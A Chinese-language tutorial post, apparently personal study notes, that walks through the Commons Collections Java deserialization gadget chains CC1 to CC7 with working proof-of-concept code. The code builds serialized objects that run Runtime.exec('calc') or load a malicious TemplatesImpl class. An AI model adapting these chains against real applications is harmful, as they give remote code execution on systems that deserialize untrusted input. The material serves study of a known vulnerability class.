CommonsCollections反序列化链整理

整理下cc链，开局先上图，做了好几个小时
可以看出其实这么多条链都只是排列组合，基本没有非用哪条链不可的情况。这8条链里面，到执行点sink前有6条路径到ChainedTransformer.transform，一条路径到TransformingComparator.compare，共7种。而执行点中有3种执行方法，所以只从已有链出发就能推出21条链。
还可以添加新的元素，比如使用DefaultedMap代替LazyMap，或者添加URLClassLoader.loadClass作为执行点，都可以创造所谓的新的链条，根据需求修改即可。
大概写了下各条链的简易版，顺序按照直觉：

CC1

CC1用IncokerTransformer+Runtime作为代码执行点，调用链用LazyMap.get。触发点用的是AnnotationInvocationHandler，因此受到jdk版本限制，需要jdk<8u71。

		Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };


        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

//		这段是用tranformedMap的版本CC0
//        HashMap<Object, Object> map = new HashMap<>();
//        map.put("value","aaa");
//        Map<Object,Object> transformedMap = TransformedMap.decorate(map,null,chainedTransformer);
//
//
//        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
//        Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
//        annotationInvocationdhdlConstructor.setAccessible(true);
//        Object o  = annotationInvocationdhdlConstructor.newInstance(Target.class,transformedMap);

        HashMap<Object, Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map,chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationdhdlConstructor.setAccessible(true);
        InvocationHandler h = (InvocationHandler) annotationInvocationdhdlConstructor.newInstance(Override.class,lazyMap);

        Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

        Object o = annotationInvocationdhdlConstructor.newInstance(Override.class, mapProxy);
        serialize(o);
        unserialize("ser.bin");

CC6

CC6将触发点改成了HashMap，解决了jdk版本限制的问题，其他和CC1一样。写Poc时候注意两个问题，一是LazyMap在put时会触发调用链导致本地执行，二是LazyMap触发一次后会添加key导致不能再次触发，这两个问题都可以通过反射改值解决。先放个没用的transfromer，序列化前再改回来。

Transformer[] transformers = new Transformer[]{
              new ConstantTransformer(Runtime.class),
              new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
              new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
              new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
      };

      ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

      HashMap<Object, Object> map = new HashMap<>();
      Map<Object,Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));

      TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

      HashMap<Object, Object> map2 = new HashMap<>();
      map2.put(tiedMapEntry, "bbb");
      lazyMap.remove("aaa");

      Class c = LazyMap.class;
      Field factoryField = c.getDeclaredField("factory");
      factoryField.setAccessible(true);
      factoryField.set(lazyMap,chainedTransformer);

      serialize(map2);
      unserialize("ser.bin");

CC3

CC3的触发和调用链部分和CC1相同，因此同样受jdk版本限制。主要修改了代码执行的地方，调用了jdk原生的TemplatesImpl+TrAXFilter类，实现动态类加载，引入了新的代码执行点。

		TemplatesImpl templates = new TemplatesImpl();
        Class tc = templates.getClass();
        Field nameField = tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"aaaa");
        Field bytecodesField = tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);

        byte[] code = Files.readAllBytes(Paths.get("D://tmp/classes/Test.class"));
        byte[][] codes = {code};
        bytecodesField.set(templates,codes);

//        Field tfactoryField = tc.getDeclaredField("_tfactory");
//        tfactoryField.setAccessible(true);
//        tfactoryField.set(templates, new TransformerFactoryImpl());
//        templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> map = new HashMap<>();
        Map<Object,Object> lazyMap = LazyMap.decorate(map,chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationdhdlConstructor.setAccessible(true);
        InvocationHandler h = (InvocationHandler) annotationInvocationdhdlConstructor.newInstance(Override.class,lazyMap);

        Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

        Object o = annotationInvocationdhdlConstructor.newInstance(Override.class, mapProxy);
        serialize(o);
        unserialize("ser.bin");

需要按照代码要求构造动态加载的类Test.java，照着报错调就行

public class Test extends AbstractTranslet {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

CC5

和CC6基本没区别，改了触发点，从HashMap变成了BadAttributeValueExpException。没什么特别意义，只是又多了一个从toString到get的链路。

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

HashMap<Object, Object> map = new HashMap<>();
Map<Object,Object> lazyMap = LazyMap.decorate(map,chainedTransformer);

TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

Class c = badAttributeValueExpException.getClass();
Field factoryField = c.getDeclaredField("val");
factoryField.setAccessible(true);
factoryField.set(badAttributeValueExpException,tiedMapEntry);

serialize(badAttributeValueExpException);
unserialize("ser.bin");

CC4

代码执行部分和CC3一样用的是TemplatesImpl+TrAXFilter。修改了触发点和调用链部分，调用链使用了在CommonsCollections4里才实现Serializable接口的TransformingComparator类，触发点使用了优先队列，提供了一个使用compare的链路。

TemplatesImpl templates = new TemplatesImpl();
      Class tc = templates.getClass();
      Field nameField = tc.getDeclaredField("_name");
      nameField.setAccessible(true);
      nameField.set(templates,"aaaa");
      Field bytecodesField = tc.getDeclaredField("_bytecodes");
      bytecodesField.setAccessible(true);

      byte[] code = Files.readAllBytes(Paths.get("D://tmp/classes/Test.class"));
      byte[][] codes = {code};
      bytecodesField.set(templates,codes);

      InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});

      Transformer[] transformers = new Transformer[]{
              new ConstantTransformer(TrAXFilter.class),
              instantiateTransformer
      };

      ChainedTransformer chainedTransformer = new ChainedTransformer<>(transformers);

      TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));

      PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

      priorityQueue.add(1);
      priorityQueue.add(2);

      Class c = transformingComparator.getClass();
      Field transformerField = c.getDeclaredField("transformer");
      transformerField.setAccessible(true);
      transformerField.set(transformingComparator,chainedTransformer);

      serialize(priorityQueue);
      unserialize("ser.bin");

CC2

和CC4一样都是CC4.0版本下的利用链，区别是代码执行部分改成了用InvokerTransformer触发动态类加载和初始化，并且不使用Transfromer数组了。由于不依赖ConstantTransformer，所以需要在最外层的参数里把构造好的templates传进去。

TemplatesImpl templates = new TemplatesImpl();
Class tc = templates.getClass();
Field nameField = tc.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates,"aaaa");
Field bytecodesField = tc.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);

byte[] code = Files.readAllBytes(Paths.get("D://tmp/classes/Test.class"));
byte[][] codes = {code};
bytecodesField.set(templates,codes);

InvokerTransformer<Object, Object> invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));

PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);

priorityQueue.add(templates);
priorityQueue.add(2);

Class c = transformingComparator.getClass();
Field transformerField = c.getDeclaredField("transformer");
transformerField.setAccessible(true);
transformerField.set(transformingComparator,invokerTransformer);

serialize(priorityQueue);
unserialize("ser.bin");

CC7

和CC6差不多，把触发点改成了HashTable，提供了一个使用equals方法的调用链，不受jdk限制，没啥特别的了。两个Map需要hash相等，其实不需要哈希碰撞，随便写一个值异或回来就行。

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);

        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
//        map1.put("yy", 1);
//        map2.put("zZ", 1);
        map1.put("hack", -50515712);
        map2.put("halfblue", 4396);
        LazyMap lazyMap = (LazyMap) LazyMap.decorate(map2, new ConstantTransformer(1));

        Hashtable hashtable = new Hashtable();
        hashtable.put(map1, 1);
        hashtable.put(lazyMap, 2);
        lazyMap.remove("hack");

        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap,chainedTransformer);

        serialize(hashtable);
        unserialize("ser.bin");

ysoserial里面的CC链就这些，实际上并不代表这些链就是完美的，了解了原理根据需要去改就行了，有点像拼乐高，一块一块的。